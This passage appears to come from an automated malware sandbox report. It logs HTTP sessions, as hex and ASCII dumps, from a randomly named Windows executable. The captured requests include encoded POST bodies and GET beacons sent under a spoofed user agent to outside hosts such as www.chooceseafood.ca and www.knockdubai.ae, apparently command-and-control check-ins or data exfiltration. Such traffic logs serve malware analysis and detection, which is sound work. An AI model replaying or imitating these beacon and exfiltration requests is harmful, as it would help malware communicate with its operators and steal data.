VlEHDVvh=YdKcO+743CdPv+G9dDMTLfLeAOeoqgsuSMPAgYUEaTE+fFLb+BipuJ1g0mjLAWmckTde8wrWwjVvQOueV5Kh5vnMXzM5Twhs+IRoKCmhvfgTqJuahKIwjxJj5aXJDWLZPyjO8L6Fm6f9m2jTmwZID5RGodGqmeMiyk49KHzfsLFdUIhhvkXAlmDSVGt0COzrL+xYFvVpfnCnx8NPOemghX0=
May 27, 2024 12:22:39.605120897 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:39 GMT content-type: text/html; charset=utf-8 content-length: 1130 x-request-id: 2a5d5a91-6ae3-42d2-91be-50ed4e34d928 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McKA9SM5xIqpnHYedHj93z5ndFqssddHOLhTIrnoLfi4ezOiShtuxfKALmYyTHBBFYMtfLS9VBxqx00XFo37ag== set-cookie: parking_session=2a5d5a91-6ae3-42d2-91be-50ed4e34d928; expires=Mon, 27 May 2024 10:37:39 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 63 4b 41 39 53 4d 35 78 49 71 70 6e 48 59 65 64 48 6a 39 33 7a 35 6e 64 46 71 73 73 64 64 48 4f 4c 68 54 49 72 6e 6f 4c 66 69 34 65 7a 4f 69 53 68 74 75 78 66 4b 41 4c 6d 59 79 54 48 42 42 46 59 4d 74 66 4c 53 39 56 42 78 71 78 30 30 58 46 6f 33 37 61 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McKA9SM5xIqpnHYedHj93z5ndFqssddHOLhTIrnoLfi4ezOiShtuxfKALmYyTHBBFYMtfLS9VBxqx00XFo37ag==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:39.605153084 CEST	583	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmE1ZDVhOTEtNmFlMy00MmQyLTkxYmUtNTBlZDRlMzRkOTI4IiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.12	49758	199.59.243.225	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:41.685619116 CEST	1739	OUT	POST /ru1k/ HTTP/1.1 Host: www.chooceseafood.ca Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.chooceseafood.ca Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.chooceseafood.ca/ru1k/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 59 64 4b 63 4f 2b 37 34 33 43 64 50 76 2b 47 39 64 44 4d 54 4c 66 4c 65 41 4f 65 6f 71 67 73 75 53 4d 50 41 67 59 55 45 61 54 38 2b 66 32 44 62 2f 67 69 70 76 4a 31 67 34 47 6a 77 41 57 6d 56 6b 54 45 56 38 77 32 74 77 67 39 76 54 74 6d 65 46 59 4b 68 79 76 6e 4d 56 7a 4d 38 4f 41 68 35 2b 49 68 73 4b 47 43 68 76 66 67 54 71 4b 6d 61 6e 59 67 77 68 78 4a 67 70 71 58 46 48 57 4c 39 50 79 36 37 38 4c 75 56 6d 4c 2f 39 6d 53 44 54 6e 44 68 49 50 35 52 45 76 64 48 74 6d 65 49 68 79 6b 30 66 4b 47 47 58 73 4a 56 64 55 50 49 37 79 32 6a 44 6b 30 6e 78 47 30 38 58 63 39 2f 37 53 65 70 30 49 4e 56 56 64 56 65 56 37 2b 6f 4c 4b 75 6d 4b 31 33 55 4e 48 47 31 51 4e 73 59 2b 78 67 4b 56 69 4a 53 65 4c 73 32 71 36 53 42 65 6a 65 36 5a 39 4f 41 48 5a 6a 34 41 61 4a 49 4b 4e 37 34 78 34 70 39 4b 33 32 54 34 61 6b 30 74 5a 41 54 46 57 4e 6a 4e 68 57 4e 57 46 64 42 54 38 30 59 6f 66 58 67 7a 75 5a 4b 4e 5a 36 31 63 4c 30 77 57 70 70 56 48 43 44 49 6b 36 4b 4f 62 34 45 51 73 6d 54 4c 53 6b [TRUNCATED] Data Ascii: VlEHDVvh=YdKcO+743CdPv+G9dDMTLfLeAOeoqgsuSMPAgYUEaT8+f2Db/gipvJ1g4GjwAWmVkTEV8w2twg9vTtmeFYKhyvnMVzM8OAh5+IhsKGChvfgTqKmanYgwhxJgpqXFHWL9Py678LuVmL/9mSDTnDhIP5REvdHtmeIhyk0fKGGXsJVdUPI7y2jDk0nxG08Xc9/7Sep0INVVdVeV7+oLKumK13UNHG1QNsY+xgKViJSeLs2q6SBeje6Z9OAHZj4AaJIKN74x4p9K32T4ak0tZATFWNjNhWNWFdBT80YofXgzuZKNZ61cL0wWppVHCDIk6KOb4EQsmTLSk9+2G3GbZ8BjOaBgLIhdu2rTOcg8jZ4jzYZgUwGtl9F9aVaOtq5GWQipGJxmcq0ynbRuHJihN3UeYzy2oHYZwL3NeXBJQbDww8OjerSB6xM7icDn8CcGmwgSHpSQOvTxQ6UrMY28v4km9dnScHx2MD10YzOEMpBjssulsqgf3IrmpmEe/XvvlP7RnacGIzjsa4ovWnFBvl7cRGq9A41SYO2AZf+qgiVc3u9NtBBY40DUGpIqED3drr9i5ZbfApAKAlYC1bnIobmSiOTd3MfeuyWecAuKDLojJVu25Gut0NQeuhAQcm1T5Hg9IeqXeP+4qFKitMuwq1LgRum3BvPsk2kAKWbBm1C1y1yum7IhWMNJBV23Q9jr9TuPF109WIHCso4VOHFqAPJkkug9ZNrUG3kWq2eFJ+KOpygNFrR/l3tTomolJBmue7j4P4jOC/xbcn87ZA6nqLkWne0yMdqqdMxxvTv4mnxyweKqCD5kIyOHVU4uOyATzjfXIY2BzHIMA7B5FOF9V23chQsXG4Wa67oy0POA4Ez/bvYXFIbEu3xfcZqFtezcKX65MH+ABOtTrguT4YFoFCKaNtCyi24dARsGN9fYQF44M3vRydzZs+ePqBrjwfVpGI0DQjet0hLqbXj90daNzGVUaJ/oZVnO9IuuZ4be0jR8eDr [TRUNCATED]
May 27, 2024 12:22:42.146519899 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:41 GMT content-type: text/html; charset=utf-8 content-length: 1130 x-request-id: f84832cb-ee76-4095-98be-eb36a471eeab cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McKA9SM5xIqpnHYedHj93z5ndFqssddHOLhTIrnoLfi4ezOiShtuxfKALmYyTHBBFYMtfLS9VBxqx00XFo37ag== set-cookie: parking_session=f84832cb-ee76-4095-98be-eb36a471eeab; expires=Mon, 27 May 2024 10:37:42 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 63 4b 41 39 53 4d 35 78 49 71 70 6e 48 59 65 64 48 6a 39 33 7a 35 6e 64 46 71 73 73 64 64 48 4f 4c 68 54 49 72 6e 6f 4c 66 69 34 65 7a 4f 69 53 68 74 75 78 66 4b 41 4c 6d 59 79 54 48 42 42 46 59 4d 74 66 4c 53 39 56 42 78 71 78 30 30 58 46 6f 33 37 61 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McKA9SM5xIqpnHYedHj93z5ndFqssddHOLhTIrnoLfi4ezOiShtuxfKALmYyTHBBFYMtfLS9VBxqx00XFo37ag==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:42.146542072 CEST	583	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjg0ODMyY2ItZWU3Ni00MDk1LTk4YmUtZWIzNmE0NzFlZWFiIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.12	49759	199.59.243.225	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:44.607484102 CEST	428	OUT	GET /ru1k/?VlEHDVvh=Vfi8NJeG6CY6n5nCPnJqd7XWKv+ZgyRabuT1vrpiYigRQGH5yz+Kvpg97XvPM12AhWFNxFGVyTc+AfyoC76cxpbyACR6Ik9/1bVLBVzltJlAlJSXh5ctyy4=&BHPD=o2nt HTTP/1.1 Host: www.chooceseafood.ca Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:22:45.082082033 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:22:44 GMT content-type: text/html; charset=utf-8 content-length: 1462 x-request-id: 5b718a81-8ac5-4863-af5f-7dc87037100c cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HQ1EYyG8XT76Mse5rVVtLjhFIypEAa9wzkvcH4FLeYQSo4y5OkhRyAlBtzhNIKrShQwqElI9o3igM7IN6+XWHA== set-cookie: parking_session=5b718a81-8ac5-4863-af5f-7dc87037100c; expires=Mon, 27 May 2024 10:37:45 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 51 31 45 59 79 47 38 58 54 37 36 4d 73 65 35 72 56 56 74 4c 6a 68 46 49 79 70 45 41 61 39 77 7a 6b 76 63 48 34 46 4c 65 59 51 53 6f 34 79 35 4f 6b 68 52 79 41 6c 42 74 7a 68 4e 49 4b 72 53 68 51 77 71 45 6c 49 39 6f 33 69 67 4d 37 49 4e 36 2b 58 57 48 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HQ1EYyG8XT76Mse5rVVtLjhFIypEAa9wzkvcH4FLeYQSo4y5OkhRyAlBtzhNIKrShQwqElI9o3igM7IN6+XWHA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:22:45.082099915 CEST	915	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWI3MThhODEtOGFjNS00ODYzLWFmNWYtN2RjODcwMzcxMDBjIiwicGFnZV90aW1lIjoxNzE2ODA1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.12	49760	103.120.178.210	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:50.826297998 CEST	697	OUT	POST /s5gg/ HTTP/1.1 Host: www.knockdubai.ae Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.knockdubai.ae Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.knockdubai.ae/s5gg/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 47 63 5a 58 78 43 33 32 35 57 74 6e 4f 35 74 57 4d 57 42 56 6a 6c 53 35 6d 66 73 58 33 4c 75 76 39 46 55 7a 73 59 37 2b 42 6f 70 65 58 31 79 71 5a 6c 35 37 31 32 57 65 4b 39 7a 56 63 41 36 49 30 6d 73 65 37 51 51 67 66 5a 37 6d 4d 71 63 2b 4b 54 43 38 55 47 6d 52 50 68 35 78 4d 4e 6a 53 4f 4b 6c 34 6b 6e 51 6e 6a 72 75 63 6b 78 71 6a 46 53 71 38 30 4d 64 4d 39 68 57 70 53 63 42 64 37 78 4e 34 45 55 44 44 45 49 30 37 6a 66 75 7a 35 65 78 69 36 31 77 78 38 30 57 76 6a 6c 39 6f 6c 6f 4f 30 59 30 39 67 4b 6f 6c 62 57 6a 4d 45 46 31 59 58 7a 58 63 47 63 7a 63 4e 38 75 4a 48 54 41 3d 3d Data Ascii: VlEHDVvh=GcZXxC325WtnO5tWMWBVjlS5mfsX3Luv9FUzsY7+BopeX1yqZl5712WeK9zVcA6I0mse7QQgfZ7mMqc+KTC8UGmRPh5xMNjSOKl4knQnjruckxqjFSq80MdM9hWpScBd7xN4EUDDEI07jfuz5exi61wx80Wvjl9oloO0Y09gKolbWjMEF1YXzXcGczcN8uJHTA==
May 27, 2024 12:22:51.842976093 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:22:51 GMT Server: Apache Last-Modified: Thu, 28 Dec 2023 09:40:51 GMT ETag: "500c-60d8eb618ba1d" Accept-Ranges: bytes Content-Length: 20492 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Error 404 - Page not found!</title> <link rel="icon" type="image/png" href="../favicon.ico"><style> html { height: 80%; } body { text-align:left; height:100%; background: #F3F3F3; font-size: 62.5%; font-family: 'Lucida Grande', Verdana, Arial, Sans-Serif; margin-top:10px; margin-bottom:10px; margin-right:10px; margin-left:10px; padding:0px; } body,td,th { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9pt; color: #3333
May 27, 2024 12:22:51.842997074 CEST	1236	IN	Data Raw: 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 Data Ascii: 33; } h1,h2,h3,h4,h5,h6 { font-family: Geneva, Arial, Helvetica, sans-serif; } h1 { font-size: 28px; font-weight:bold; colo
May 27, 2024 12:22:51.843010902 CEST	1236	IN	Data Raw: 74 32 67 41 44 43 4b 67 67 51 51 46 67 46 41 51 49 49 71 30 55 41 41 59 52 56 4a 55 41 41 59 52 55 45 43 43 43 73 67 67 41 42 68 46 55 51 49 49 42 59 73 4e 6a 44 41 42 42 41 57 46 55 43 42 42 41 4c 41 77 4f 6d 55 6f 41 41 77 71 6f 53 49 49 43 77 Data Ascii: t2gADCKggQQFgFAQIIq0UAAYRVJUAAYRUECCCsggABhFUQIIBYsNjDABBAWFUCBBALAwOmUoAAwqoSIICwCgIEEFaLAAIIq0qAAMIqCBBAWAMEIICwqgQIIKyCAAGEVRAggLAKAgQQVkGAAMIqCBBAWJ0EEEBYVQIEEFZBgADCmmwAAgirSoAAwioIEEBYbQcIIKwqAQIIqyBAAGEVBAggrIIAAYQ14gACCKtKgADC6iSAAMKqE
May 27, 2024 12:22:51.843022108 CEST	1236	IN	Data Raw: 20 54 68 65 20 6f 70 65 6e 2d 73 6f 75 72 63 65 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6e 74 72 6f 6c 20 70 61 6e 65 6c 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 Data Ascii: The open-source web hosting control panel" border="0"></a> <div class="content"> <img style="float:left; margin-right:20px; margin-top:20px;" border="0" alt="" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABcC
May 27, 2024 12:22:51.843034983 CEST	1236	IN	Data Raw: 43 44 79 61 6c 31 38 48 55 48 6c 66 59 6f 36 71 55 49 75 70 53 48 35 6c 57 51 7a 71 62 67 53 54 56 55 36 7a 37 54 56 68 65 79 6e 52 35 79 42 51 57 6d 73 6f 4c 49 37 73 59 6c 47 35 35 47 4e 6e 4d 52 76 48 77 50 4e 47 6b 52 79 6a 4d 33 46 67 74 39 Data Ascii: CDyal18HUHlfYo6qUIupSH5lWQzqbgSTVU6z7TVheynR5yBQWmsoLI7sYlG55GNnMRvHwPNGkRyjM3Fgt9f3kaUquKJyPkZ4mOZnW70rE5DXeYvDGBmWIZE2MrUfck2NiN+mweCakTKzd8D2s7BpDpLMKXijh6JIkjz2YwUwoxU/eQSTsoJDvx+IEeXHTOAYQCsGwX8sYp3f7slz6lpv7u905GyDxH8fD/vrw7/YqvASXenc2K3
May 27, 2024 12:22:51.843046904 CEST	1236	IN	Data Raw: 59 5a 48 55 33 4b 34 58 41 43 6b 6b 51 51 71 4a 35 41 45 42 41 51 70 5a 43 45 4c 66 53 55 4a 50 35 76 77 62 48 4c 50 44 65 77 61 6c 55 66 54 6c 39 79 42 4c 4a 72 59 4e 61 32 6f 63 76 6a 6d 4a 35 65 67 71 64 47 63 77 53 32 42 46 6d 5a 67 4b 46 30 Data Ascii: YZHU3K4XACkkQQqJ5AEBAQpZCELfSUJP5vwbHLPDewalUfTl9yBLJrYNa2ocvjmJ5egqdGcwS2BFmZgKF08fVS2ml9//pfa0Cm99/wWwkldwXkGd7JBFuvhIce6UYrysIKZhgdErJeC6edehQrFlH6ugoBEP5EYXRMUfHS1wY2PBK+SFmiyOQMmcBE/FxgV5DQT8Gm9UNY0l2FXZPIG1Oo2T72T3Xj4FgCSoqgtmeRVTrh249sj
May 27, 2024 12:22:51.843061924 CEST	1236	IN	Data Raw: 63 6f 57 4e 4b 72 5a 73 64 68 42 74 4f 6f 46 48 55 38 73 54 65 50 45 6d 57 6f 4b 6e 56 52 38 62 52 51 30 50 4c 59 66 4e 59 59 4f 68 4d 72 36 4f 33 4b 44 41 59 33 6e 6d 63 6c 33 44 6a 68 6d 61 76 77 32 4a 31 37 73 52 45 55 67 73 42 78 32 69 52 34 Data Ascii: coWNKrZsdhBtOoFHU8sTePEmWoKnVR8bRQ0PLYfNYYOhMr6O3KDAY3nmcl3Djhmavw2J17sREUgsBx2iR4J+42mQPMi0ETKcv3QygKiUWZgd+cJbeYWLfao4ufQlSrUWqHMKIm9hzqxo6D9IX+DBKJEjw5Cb21f1Or8uCVv5KA1Pd/6DzZ1a+Uk3VWjA5fmsY9u3IYn+1FoNloN8ZhNE1sXj+B1UvpL5q9kPT6cynKee7sxa48E
May 27, 2024 12:22:51.843071938 CEST	1236	IN	Data Raw: 64 6f 74 47 57 4d 6a 43 59 77 4f 74 35 46 4d 6b 2f 52 31 77 67 35 48 4d 56 46 6d 6b 4d 68 4c 70 46 49 61 63 2b 64 43 39 6b 4d 58 6e 57 32 68 4a 34 4f 63 6c 73 7a 51 70 4c 6b 4c 37 70 75 76 76 50 6b 4b 6f 78 4d 38 62 70 79 42 61 30 77 44 53 56 71 Data Ascii: dotGWMjCYwOt5FMk/R1wg5HMVFmkMhLpFIac+dC9kMXnW2hJ4OclszQpLkL7puvvPkKoxM8bpyBa0wDSVqUajdda1X2Zt+WQISTX897Vm7rte1fhiJPQiMEE8OFfDYo3lodGjNkM6iFeD0wTI2rFSQMAT7N5n3m3NEDI3AsBo9qiTWo6IorGSfoIaYqkiYLGUQmr0ETYXllXn2IZt5tNzFODolBp2M2CgKYv/REobBC85ygzwy4
May 27, 2024 12:22:51.843084097 CEST	1236	IN	Data Raw: 46 6d 42 5a 4d 44 56 4b 6c 41 38 43 59 52 4f 47 4b 53 42 41 6e 64 45 37 32 35 54 46 64 42 39 46 77 4a 34 6c 4a 77 6d 73 79 57 43 70 72 6b 48 4d 31 76 59 32 42 52 46 58 39 77 38 51 69 53 35 57 6d 55 35 42 37 30 75 78 45 4f 74 7a 72 77 79 58 73 59 Data Ascii: FmBZMDVKlA8CYROGKSBAndE725TFdB9FwJ4lJwmsyWCprkHM1vY2BRFX9w8QiS5WmU5B70uxEOtzrwyXsYszUbhkrwTKpDIzUQPfu3V7+kAamXPnddoC0vqKzYjCdhuqzjgScqmK4VyRs+wnYbSVbWhZeRtK21QML7CZL9icJK8+hLPE/MuRL5nxWnhvH4h0cSb5OLxNlzRRcLhUEYzXWrKFH8eGEU/0qsbmORnzuLl5S4BKF4t
